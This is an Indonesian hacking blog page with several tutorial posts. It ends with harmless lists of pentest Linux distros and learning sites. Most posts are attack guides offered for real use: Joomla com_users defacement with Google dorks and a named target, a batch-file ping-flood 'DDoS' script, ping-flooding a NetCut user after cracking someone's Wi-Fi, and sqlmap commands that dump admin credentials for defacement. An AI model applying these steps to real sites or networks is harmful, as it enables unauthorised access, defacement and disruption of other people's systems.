Deface Using teknik Com_User

Hacking Tutorial

Deface Using teknik Com_User

BrainLuqman   8:12 AM   Comment  

  oke!malah para blogger!

sekarang saya akan memberikan ilmu Deface saya kepada kalian :D (ilmu semua orang sih :v).

teknik ini cukup sulit,tapi seru :v tantangannya itu di nyari website nya menurut saya :v

pengalaman pertama saya mencoba Com_user ini,saya langsung berhasil gan!mas!mba!bro!

site tersebut adalah www.orfeogreco.de/en/ tapi website nya sekarang udah bangkit lagi dengan security yang lebih bagus -_- tapi gpp lah :v

Baca Juga : Cara Deface Dengan Com_Sexy

 

Teknik com_users ini prinsip kerjanya adalah halaman yang digunakan untuk mendaftar sebagai admin pada situs joomla. Bug com_users banyak ditemukan pada joomla versi 1.6 dan 1.7.

Gunakan dork dibawah ini di google.

· inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br

·         site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla

·         inurl:index.php joomla! 1.7 - open source content management site:

·      inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com

·         intext:joomla! 1.7 - open source content management site:jp

·         inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id

·         inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as

·         inurl:index.php/19-sample-data-articles/joomla site:com

Copy dork diatas dan paste di kotak pencarian di google. Cari targetnya sesuai hasil pencarian.

Misal disini saya memakai contoh website http://www.cognobase.com/cms/.

kita buka halaman administratornya untuk mengetahui situs tersebut apakah vuln atau tidak.

URLnya http://www.cognobase.com/cms/administrator

Kalau 2 garis dibawah situs saling berdekatan seperti dibawah ini, berarti vuln (memiliki celah com_users)

Sekarang download dulu exploit joomla disini http://www.mediafire.com/view/q1zdfkwlez84qwr/Exploit_Joomla.html

Explot: index.php?option=com_users&view=registration

Seperti dibawah ini site_target.com/ index.php?option=com_users&view=registration

Kemudian akan muncul halaman pendaftaran. Kebetulan itu website demonya pake bahasa apa ini gak jelas. Hehe, tapi intinya sama aja.

Setalah muncul halaman pendaftarannya, tekan CTRL + U.

Selanjutnya tekan CTRL + F (untuk mengaktifkan fitur find). Kemudian ketik hidden pada kotak pencarian, klik Next.

Maka hasilnya seperti dibawah ini.

Copy token dan urlnya seperti gambar dibawah ini.

Buka exploit joomla yang kita download tadi. Klik kanan, kemudian pilih Open With, lalu klik Notepad.

Paste URL dan token dari hasil CTRL + U tadi. Kemudian save.

Double klik Exploit Joomla.html yang tadi kita edit. Kemudian terlihat seperti gambar dibawah ini. Edit username, email, dan password sesuai keinginan kita. Lalu klik Register.

Nanti ada tulisan

“Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by clicking on the activation link when you receive the activation email.”

Sekarang buka email agan dan buka link konfirmasinya.

Setalah itu login ke halaman administrator tadi.

Maka hasilnya seperti ini.

sekian postingan saya kali ini! semoga bermanfaat!
eits,jangan deface website lokal yaaa ;)
happy Defacing!

membuat Tools DDoS sendiri dengan Notepad

Hacking Tutorial

membuat Tools DDoS sendiri dengan Notepad

BrainLuqman   8:10 AM   Comment  

malam! 
pada tau DDoS kan? tau lah! nah,disini saya akan memberikan ilmu/tutorial cara membuat tools DDoS sendiri :D

ini tools yang dibutuhkan  :

1. Notepad .
2. Script DDos .

langkah langkah nya gan :

1. Buka Notepad.
2. Copy & Paste Kan Script Di Bawah Ini :

@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server    +
echo + Author : Luqmanul Hakim              +
echo + Visite : LuqmanSeo.blogspot.com +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

     3.   Simpan Dengan Type "All Files" Dan Beri Nama Sesuka Anda Dengan Format .bat ( Contoh : Ddos.bat )

Cara Pakai :

Pada menu Server-Target -> *    Masukan IP / Host Target    *
masukan alamat web yang ingin di DDOS.

okk! sekian dan terima kasih! :D 

Source : LuqmanSeo

menyerang balik pengguna NetCut? simple!

Hacking Tutorial

menyerang balik pengguna NetCut? simple!

BrainLuqman   8:05 AM   Comment  

malam para Blogger!

pada tau NetCut? nah,penjelasan dan cara pakai nya nanti akan saya bahas,oke,sekarang saya akan berbagi pengalaman saya,waktu itu saya lagi duduk sendirian di suatu mall di bandung (wkwk jomblo),disitu saya menemukan beberapa SSID (wifi) yang berpassword,akhirnya saya coba crack dengan aircrack-ng di linux,(untuk tuturial akan tersedia di blog ini). setelah saya dapat passwordnya,saya coba untuk test speednya,dan wow! cepat juga.. lalu saya pakai untuk browsing,download,dll... beberapa menit kemudian,laptop saya disconnect dari wifi tersebut,ternyata bener gan!mas!bu!bro!sist!tong! saya kena Cut!

tapi tenang :D masih ada trik untuk menyerang balik pengguna NetCut yang menyebalkan! here it is!

1. Buka CMD caranya klik Start kemudian ketik cmd.exe, maka akan muncul tampilan cmd seperti gambar berikut:

2. Selanjutnya ketik arp –a lalu tekan Enter. 

Maka yang terdapat dalam cmd Dynamic adalah server jaringan anda, jika terdapat dua atau lebih dynamic maka diantaranya adalah pengguna NetCut. 

Untuk menyerang kembali pengguna netcut tersebut, maka anda catat ip dynamic yang mencurigakan tersebut (misalnya: 192.168.3.219).

Baca Juga : Port Forwarding Dengan Ngrok

 Namun jangan sampai keliru dengan ip server anda, biasanya ip server anda di akhiri dengan angka 1 (misalnya: 192.168.3.1). Selanjutnya untuk menyerang pengguna netcut tersebut, anda tinggal ketik ping ip pengguna neetcut –t (contoh: ping 192.168.3.219 –t) lalu tekan Enter.

3. Selesai dan yang anda lakukan pada perintah di atas adalah akan membuat pengguna netcut kelabakan karena browsernya akan hang. Maka mau tidak mau pengguna netcut tersebut harus merestart laptopnya.

Deface website using SQLmap

Hacking Linux Tutorial

Deface website using SQLmap

BrainLuqman   8:04 AM   Comment  

SQLi?
ya! kenapa harus SQLi? menurut saya pribadi sih karena ini teknik Deface yang paling laku :v ga juga sih ,tapi menarik aja gitu! nah,disini kalian harus pake linux yaa! tapi di windows juga ada sih...
check it out!

sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

biar lebih jelas saya akan menjelaskan sedikit tentang apa itu SQL injection dan database.

• SQL injection adalah teknik hacking di mana attacker dapat menyisipkan perintah-perintah SQL melalu URL untuk di eksekusi oleh database. bug atau vulnerability ini terjadi karena kelalian seorang programer atau webmaster dalam melakukan pemograman web seperti tidak difilternya variabel dalam web tersebut.
• Database adalah kumpulan informasi yang disimpan di dalam komputer atau webserver secara sistematik yang berguna untuk memperoleh informasi dari basis data tersebut.

ok cukup penjelasanya, kita langsung aja ke tutorial sqlmap dalam memanipulasi bug SQL injection.

pertama download dulu sqlmap nya :
sqlmap.zip untuk file berekstensi .zip
sqlmap.tar.gz untuk file berekstensi tar.gz

setelah di download extract file sqlmap nya, saya sarankan di desktop saja agar lebih mudah untuk prosesnya, atau di direktori lain juga boleh tergantung dari selera kita masing-masing :-D . kemudian rename folder yang telah di extract menjadi "sqlmap" (tanpa tanda kutip).

Baca Juga : Alasan Kenapa Website Pemerintah Mudah di Deface

tools ini adalah tools yang berbasis program python, jadi untuk menjalankanya kita harus menginstall program python. kalau kamu pengguna linux kamu tidak usah repot-repot untuk menginstall python karena di linux sudah ada. tapi kalau kamu pengguna windows, kamu harus menginstall program python terlebih dahulu.

download python :

Windows x86 MSI Installer (2.7.3) untuk windows x86/32 bit
Windows X86-64 MSI Installer (2.7.3) untuk windows 64 bit
Mac OS X 64-bit/32-bit x86-64/i386 Installer (2.7.3) untuk MAC OS X 10.6/10.7
www.python.org/ftp/python/2.7.3/python-2.7.3-macosx10.3.dmg untuk MAC OS 10.3 - 10.6

kalau sudah di download kita lanjut ke step berikutnya.
pertama buka dulu terminal (linux) atau CMD (windows) kemudia ketikkan

untuk linux :

user@linux:~$ cd /Desktop/sqlmap/ 

untuk windows :

C:\Documents and Settings\user> cd /desktop/sqlmap/

kemudian tekan enter.

screenshoot ini diambil dari terminal backtrack 5 r2

kita ke step selanjutnya, saya anggap kamu sudah mempunyai target kamu sendiri, kalau belum ada silahkan cari sendiri :-p .

disini saya umpamakan ada sebuah situs dengan domain name "https://www.target.com" . dan mempunyai vulnerability pada tag "index.php?id=7" dengan methode get. langsung saja kita kembali ke terminal ata cmd tadi dan ketikkan lagi

linux :

user@linux:/Desktop/sqlmap# ./sqlmap.py -u https://www.target.com/index.php?id=7 --dbs

windows :

C:\Documents and Settings\user\desktop\sqlmap>sqlmap.py -u https://www.target.com/index.php?id=7 --dbs

perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

nah sekarang kita tunggu beberapa saat dan biarkan sqlmap bekerja sampai sqlmap menemukan database dari target kita. setelah bebearap saat sqlmap telah berhasil menemukan nama database dari target kita. asiikk !!!

saya umpamakan sqlmap berhasil mendapatkan 2 nama database yaitu

• information_schema
• my_db

langkah selanjutnya yang akan kita lakukan adalah mengintip table yang ada di dalam database tersebut, tapi database yang mana ? hmmmm sepertinya saya lebih tertarik sama database yang bernama "my_db".!! loh kenapa ? mungkin feeling aja :-p

sekarang kita ketikkan lagi perintah ini

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db --tables

karena saya capek mengetikkan contoh untuk linux dan windows, jadi saya akan mengetikkan 1 contoh saja, bagi pengguna linux harus diawali dengan tanda "./" sebelum comand sedangkan di windows tidak di pakai alias langsung aja "sqlmap.py -u bla...bla...bla.."

Baca juga : Wikileaks merilis dokumen Malware dan Tehnik Hacking CIA

ok next step, setelah kita tunggu beberapa saat ternyata sqlmap menemukan table yang ada di dalam database "my_db". saya umpamakan table-table tersebut adalah sebagai berikut.

• admin
• members
• item

nah karena saya ingin melakukan deface, maka saya akan membuka isi dari table admin tersebut. langsung aja kita ketikkan di terminal atau CMD perintah ini

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin --columns

 lalu enter dan tunggu beberapa saat, dan kita mendapati "column" dari "table" admin tadi. saya umpamakan nama columnya

• ID
• username
• password
• email_address
• country

disini saya akan mengambil informasi dari dalam "column" admin tadi, yang ingin saya intip adalah "username","password",dan "email_address". maka saya akan kembali mengetikkan perintah

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin -C username,password,email_address --dump

 dan hasilnya saya mendapati sebagai berikut :

admin:123456:admin@target.com

 ini artinya :

• admin = username
• 123456 = password
• admin@target.com = email_address

nah sekarang saya tinggal mencari admin login dan siap melakukan deface . :-)

sekian dulu tutorial dari saya, kalau ada kekurangan saya minta maaf karena saya ini hanyalah seorang newbie yang ingin berbagi sedikit ilmu.

n.b : segala sesuatu yang ada pada tulisan ini hanyalah semata-mata untuk pembelajaran, segala resiko karena penerapanya kembali kepada mental para pembaca dan penulis tidak bertanggung jawab atas apa yg terjadi.

Distro Linux untuk Hacker! always update

Hacking Linux

Distro Linux untuk Hacker! always update

BrainLuqman   8:00 AM   Comment  

Sistem Operasi Linux memiliki berbagai versi yang disebut sebagai distro. Jumlah distro Linux sangat banyak, karena siapapun dapat mengembangkan Linux-nya sendiri dan menciptakan distro sendiri tanpa menghilangkan kredit pengembang sebelumnya. 

Pertama kali saya menggunakan Linux, saya menggunakan distro kali linux yang membuat saya kesulitan dalam menggunakannya,sebuah kesalahan besar jika kita baru pertama kali memakai linux tetapi langsung memakai distro yang user Interface nya sulit digunakan bagi pemula. Melelahkan namun membuat saya banyak belajar, malahan sampai sekarang saya nggak bisa jadi hacker juga.. Hhaha.

Untuk mempermudah kamu biar bisa dipanggil "Hacker", berikut ini  Distro Linux Populer yang Digunakan Oleh Hacker seperti dikutip dari THT :

 

#1 Kali Linux

#2 Back Track

#3 NodeZero

#4 BackBox Linux

#5 BlackBuntu

#6 Samurai Web Testing Framework

#7 Knoppix STD

#8 Pentoo

#9 Weakerth4n

#10 Matriux Kripton

#11 Deft

#12 Caine

#13 Bugtrack

#14 Arch Linux (especially blackArch/ArchAssault)

 

 want more?

 siapa tau mau ngoleksi :D

-GnaTrack

-MAADStrack

-darkMint

-FIRE

- DracOS (indonesia :D)

-ESSPEE (extreme security scanning penetration testing & exploitation environtment

-reaper

-black-hat-sec Hades OS

-anonymous live CD

-Cyborg Hawk

-Parrot Security OS

-NST

-ADHD

-wifiSlax

-Xiaopan

-Fedora Security Spin

- ArchBang

- SEAnux (Syrian Electronics Army)

-freepto

-Hakin9

-katana

-Kcpentrix

-NetHunter

-mobiSec

-NetSecL

-PHLAK

-Russix

-Santoku

-Ubuntu White-hat edition

-VIPER 

 

 yak,,mungkin cuma segitu yang bisa saya kasih tau :v soalnya rada susah nyari pentest OS selain 14 itu :v wkwk. untuk link bisa searching di google yaa!

have fun and happy Hacking!

TOP 8 Website Untuk Belajar Hacking 2016

Hacking

TOP 8 Website Untuk Belajar Hacking 2016

BrainLuqman   5:45 AM   Comment  

LuqmanSeoFriendly - Situs untuk belajar hacking

Berikut adalah 8 situs untuk belajar  hacking

LuqmanSeoFriendly - Semua orang ingin belajar hacking dalam zaman sekarang ini. Namun, ini bukan tugas yang mudah sampai Anda memiliki pengetahuan dasar tentang komputer dan keamanan jaringan. Bagi pemula untuk tahu, ada dua jenis Ethical Hacking (White Hat) dan tidak etis (Black Hat). Hacking etis dianggap ilegal sementara etika hacking dapat dianggap sebagai hukum.

Kami menyediakan Anda dengan daftar situs yang menawarkan konten topi putih. Namun, penting untuk dicatat bahwa sebagai pemula untuk tidak melakukan apapun peretasan & retak taktik yang melanggar hukum cyber.

Hackaday

Hackaday adalah salah satu dari peringkat situs yang menyediakan peretasan berita dan segala macam tutorial untuk hacking dan jaringan. Hal ini juga menerbitkan beberapa artikel terbaru setiap hari dengan penjelasan rinci tentang hardware dan software hacks sehingga pemula dan hacker sadar tentang hal itu. Hackaday juga memiliki saluran YouTube mana posting proyek dan bagaimana-untuk video. Ini menyediakan pengguna konten campuran seperti peretasan hardware, sinyal, jaringan komputer dan lain-lain Situs ini sangat membantu tidak hanya untuk hacker, tetapi juga untuk orang-orang yang di bidang Digital Forensik dan Penelitian Keamanan.

Evilzone Forum

forum hacker ini memungkinkan Anda melihat diskusi tentang hacking dan cracking. Namun, Anda harus menjadi anggota di situs ini untuk memeriksa pertanyaan dan jawaban mengenai etika hacking. Yang perlu Anda lakukan adalah mendaftar untuk mendapatkan ID Anda untuk mendapatkan jawaban untuk pertanyaan Anda di sana. Solusi untuk pertanyaan Anda akan dijawab oleh hacker profesional. Ingat untuk tidak bertanya trik hacking yang sederhana, orang-orang masyarakat di sini sangat serius.

HackThisSite

HackThisSite.org, sering disebut sebagai HTS, adalah hacker dan keamanan situs online yang memberikan hacker berita serta tutorial hacking. Hal ini bertujuan untuk menyediakan pengguna dengan cara untuk belajar dan berlatih dasar dan lanjutan "hacking" keterampilan melalui serangkaian tantangan, di lingkungan yang aman dan legal.

Istirahat Keamanan

Motif dari situs ini dijelaskan dalam namanya. Break The Security menyediakan semua jenis hacking hal seperti hacking berita, serangan hacking dan hacking tutorial. Ini juga memiliki berbagai jenis program yang berguna yang dapat membuat Anda seorang hacker bersertifikat. Situs ini sangat membantu jika Anda mencari untuk memilih keamanan dan bidang hacking dan cracking.

EC-Council - CEH Ethical Course Hacking

International Council of Electronic Commerce Consultants (EC-Council) adalah organisasi profesional anggota-didukung. EC-Council dikenal terutama sebagai badan sertifikasi profesional. Its sertifikasi paling terkenal adalah Ethical Hacker Bersertifikat. CEH, yang merupakan singkatan dari Ethical Hacker Komprehensif menyediakan lengkap etika hacking yang dan pelatihan keamanan jaringan program belajar hacking yang topi putih. Anda hanya perlu memilih paket kursus hacking dan bergabung untuk mendapatkan dilatih untuk menjadi seorang hacker etika profesional. Situs ini membantu Anda untuk mendapatkan semua jenis program yang membuat Anda seorang hacker etika bersertifikat.

Hack In The Box

Ini adalah situs web populer yang menyediakan berita dan kegiatan keamanan dari bawah tanah hacker.Anda bisa mendapatkan artikel hacking yang besar tentang Microsoft, Apple, Linux, Programming dan banyak lagi. Situs ini juga memiliki komunitas forum yang memungkinkan pengguna untuk membahas tips hacking yang.

SecTools

Seperti namanya, SecTools berarti alat-alat keamanan. Situs ini ditujukan untuk memberikan trik yang signifikan mengenai keamanan jaringan yang Anda bisa belajar untuk melawan ancaman keamanan jaringan. Ia juga menawarkan alat-alat keamanan dengan penjelasan rinci tentang hal itu.

Jika Ingin Menambahkannya, Berikan Komentar Anda Di Bawah !
Semoga bermanfaat ^_^ :)